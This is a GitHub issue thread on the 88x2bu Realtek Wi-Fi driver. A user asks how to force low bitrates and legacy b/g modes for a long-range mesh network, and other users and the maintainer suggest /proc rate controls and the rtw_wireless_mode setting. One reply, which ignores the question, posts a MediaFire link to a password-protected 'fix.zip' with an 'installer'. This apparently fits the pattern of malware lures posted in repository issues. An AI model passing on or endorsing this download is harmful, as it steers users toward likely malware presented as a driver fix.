morrownr/88x2bu-20210702 #230: How to Set Low Bitrate Mode for Realtek RTL88xxBU Driver?

akg19, 2024-08-28:
Hello,
I'm using the Realtek RTL88xxBU driver and need to configure it to operate in low bitrate mode. However, I noticed that there's no command support from iw to set or modify the bitrates. Could anyone guide me on how to set the bitrate or configure the driver to operate in a low bitrate mode?
Specifically, I'm looking for:
Any available commands or tools that might support this functionality.
Steps to manually modify driver settings if direct commands aren't supported.
Additionally, my final goal is to force the driver to run in 802.11 b/g modes, connecting only in CCK and DSSS speeds, which are legacy 2.4 GHz modes. This setup is intended for a long-distance MESH network with very low bandwidth requirements.
Furthermore, I have not been able to find the hardware register map for this driver, so I'm unable to verify the register settings or understand the changes made when specific bits are modified.
Any help or documentation references would be greatly appreciated!
Thank you in advance!

LC-JiaZhaorong, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

libc0607, 2024-09-13:
Check ```rate_ctl``` in ```/proc``` (args ref.: https://github.com/Vito-Swift/rtl8814au-ext/blob/main/doc/how_to_do_unicast_rc.md)  
You may also want to check ```ack_timeout``` in ```/proc```

morrownr, 2024-09-13:
Hi @akg19 

> I'm using the Realtek RTL88xxBU driver and need to configure it to operate in low bitrate mode.

Run:

$ sudo sh ./edit-options.sh

That will load the active conf88x2bu.conf file. Scroll down to the module parameter called:

rtw_wireless_mode

Let me know if you have questions.

akg19, 2024-09-13:
Can you please point me the for the edit_options.sh file ?Where is it located?Thanks in advance

morrownr, 2024-09-13:
> Can you please point me the for the edit_options.sh file ?Where is it
located?

Are you using the driver in this repo?